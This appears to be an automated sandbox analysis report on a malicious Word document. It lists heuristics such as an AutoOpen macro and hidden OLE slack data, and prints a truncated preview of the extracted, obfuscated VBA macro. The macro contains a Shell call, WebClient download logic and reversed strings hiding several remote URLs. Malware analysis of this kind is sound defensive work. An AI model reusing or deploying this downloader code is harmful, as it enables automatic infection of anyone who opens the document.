Verdict: MALICIOUS
Risk Score: 122
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is an OLE document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The script contains a call to the 'Shell' function, which is highly suspicious and likely used to download and execute a secondary payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.
Heuristics (5)
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 177,664 bytes but its declared streams total only 36,034 bytes; 141,630 bytes (80%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro present.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41612 bytes |

SHA-256 of macros.bas: e8e4a9ab77a4928fbc8cb5fba0e29ed3088aa229796744bc84559b8ab1632d5b
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "baYpFlDs"
Sub Enqpod(FzTjbn)
Dim IJmlRR, XkEWEY
nzoit = 15996 = DBpXj
wVPtj = sPfSzm - CStr(51966) + jCmSkE - Tan(83101) - 34045 / 94758 / (60083 - CBool(8680) * 65327 / hFIzOk)
Dim kCVKp, jkHhp
SNUAOX = 75954 = UjYkpz
LKXVl = VKijc - CStr(55188) + YGJQq - Tan(24337) - 28895 / 34161 / (23558 - CBool(7956) * 88570 / aJlEil)
End Sub
Sub qoWIzJRHICjmBE(MFqQwMiDfXJM As String)
On Error Resume Next
Dim qHVak, EpzDq
muTDN = 43258 = tckrw
dvKsk = AvHlM - CStr(6951) + ZElWRO - Tan(41704) - 69474 / 15421 / (60642 - CBool(13773) * 11529 / hWrsG)
Dim WTHQt, NzqYiI
zhzDH = 11114 = cdWVP
mMXiD = fwhMS - CStr(77662) + ZERfLd - Tan(44265) - 99659 / 12665 / (81123 - CBool(70850) * 35709 / montwm)
[Shell] qKAZM + Chr(vbKeyC) + MFqQwMiDfXJM + QdLSUfPP + OLzKssDjWnL, lCrHA + 0 + lCrHA
Dim brIoQ, oBPDrT
MtooVF = 6694 = GZcvm
HndimA = pmDdE - CStr(98604) + OQLTiT - Tan(60557) - 98407 / 28354 / (84281 - CBool(1052) * 63902 / AURfs)
Dim ljNlYF, qXHlK
GcEqO = 18382 = SOIYl
FszUVX = aNuBim - CStr(26379) + cIrdh - Tan(67507) - 51323 / 60895 / (91889 - CBool(57925) * 5293 / bLWYo)
End Sub
Attribute VB_Name = "zTtDuoJT"
Sub JQsAi(XOzin)
Dim psowL, kBWctl
pabIK = 79400 = mfHkEK
ufEcQp = JbEGiD - CStr(47109) + whWHt - Tan(79979) - 66056 / 91307 / (12315 - CBool(78591) * 87359 / XJkEs)
End Sub
Function zDiNvbRjd()
On Error Resume Next
Dim DpVSz, vHfwWB
lHUjaO = 93590 = rMkwn
hbzqA = hziwd - CStr(65015) + MmJjYE - Tan(24517) - 15010 / 99554 / (5495 - CBool(50562) * 19937 / vkMdlU)
Dim pcjzI, fEmHln
XiXFJ = 34711 = VQWXUG
zJDiX = NvSuv - CStr(14860) + QNJops - Tan(20847) - 88920 / 85011 / (87817 - CBool(90502) * 39710 / wrYGI)
jFMZDj = JWzoLF("YTP9'+' + ci'+'l'+'b'+'up:vne2vD = '+'CD'+'S'+'2'+'vD;)o'+'Z9'+'@oZ9(t'+'ilpS.oZ9sE3D8", 78392 - 78392 + 6 + 78392 - 78392, 78392 - 78392 + 78 + 78392 - 78392)
Dim BVjuiY, UzcQd
BiOIH = 65675 = cviHQI
FUVWM = SGRkSb - CStr(30398) + XNRbQl - Tan(36859) - 75637 / 69476 / (67952 - CBool(34272) * 45874 / AFrZda)
Dim XrdsSi, XcvRKz
cGwKGq = 45844 = nnsHsk
ailCb = zmwihu - CStr(99211) + rAqjX - Tan(18190) - 52656 / 110 / (80148 - CBool(2921) * 70452 / uEpAL)
WPUKOTCs = JWzoLF("o1OT6+'UYY2vD;modn'+'ar '+')o'+'Z9to'+'Z'+'9+oZ9c'+'ejbo'+'-woZ9+oZ9eo'+'Z'+'9+oZ9'+'no'+'Z9(& = dsad'+'asn2v'+'D'((iq", 20244 - 20244 + 3 + 20244 - 20244, 20244 - 20244 + 111 + 20244 - 20244)
Dim DLCQjH, wdUAb
wYKvn = 4613 = Ualapj
Xwuww = rroQb - CStr(37995) + KajGzN - Tan(54045) - 77832 / 60626 / (68995 - CBool(17217) * 5019 / kVcZbb)
Dim zKURu, ToAjiE
BEqqht = 51309 = VlEQJl
VhcQKK = TkARJB - CStr(33534) + QrzZu - Tan(82935) - 78408 / 52892 / (61727 - CBool(2544) * 41913 / bYQBlv)
LDItjYhVE = JWzoLF("BjMOc:Vne$ (.|)29]rAHC[,)67]rAHC[+08]rAHC[+MuUdkQ6", 94564 - 94564 + 8 + 94564 - 94564, 94564 - 94564 + 41 + 94564 - 94564)
Dim STERu, CkFqPj
SBVMQ = 68824 = IjFvPo
XuUzj = hwALa - CStr(9041) + rGjlQR - Tan(93637) - 43399 / 49923 / (5876 - CBool(7354) * 70926 / ELmNI)
Dim wZzzpU, NXuZU
TiRdSb = 68558 = vJkCLw
WpSiB = PIzVmj - CStr(15277) + kUiui - Tan(84766) - 15443 / 39383 / (42389 - CBool(13959) * 44173 / BBQOw)
cRzbYJth = JWzoLF("cC68e'+'ilCbeW'+'.'+'t'+'eN.'+'m'+'etsy'+'S )oZ'+'9'+'tce'+'jbo-oZ9+oZ9'1R", 3809 - 3809 + 3 + 3809 - 3809, 3809 - 3809 + 68 + 3809 - 3809)
Dim Wlqhbv, GDVSI
rbcKoB = 16414 = FKCTLH
aOskYI = WRCtn - CStr(54360) + omCOb - Tan(59625) - 82173 / 48179 / (82361 - CBool(53672) * 24118 / zQaoOP)
Dim Hoojad, wtpfz
DQjvLh = 86094 = biORj
bjmHi = jioddj - CStr(39080) + mQtpRa - Tan(66706) - 96616 / 73163 / (38979 - CBool(39892) * 87168 / KfKaSq)
uHHaFhmZNcV = JWzoLF("MU50aB'+'u/m'+'oc.onikab//'+':'+'ptth@/XxYS'+'/su'+'.'+'ne'+'gac'+'//:ptth@/S'+'gaHG'+'0/mo'+'c'+'.puorg'+'icapra//:ptth@/hGXvYB/ku.'+'oc.ygol'+'o'+'nhc'+'et-'+'tna'+'rel'c", 76430 - 76430 + 2 + 76430 - 76430, 76430 - 76430 + 166 + 76430 - 76430)
Dim tQGhw, FVbDRb
CfKkY = 42 = mduSn
NYCiCL = LzVKMs - CStr(34414) + NWiCs - Tan(62571) - 70471 / 61135 / (41406 - CBool(48685) * 4005 / jWQVo)
Dim fTkdwV, EiJUs
qzSmW = 99239 = ifjnT
Nrvbh = SddEPV - CStr(24645) + anXCC - Tan(369
... (truncated)
```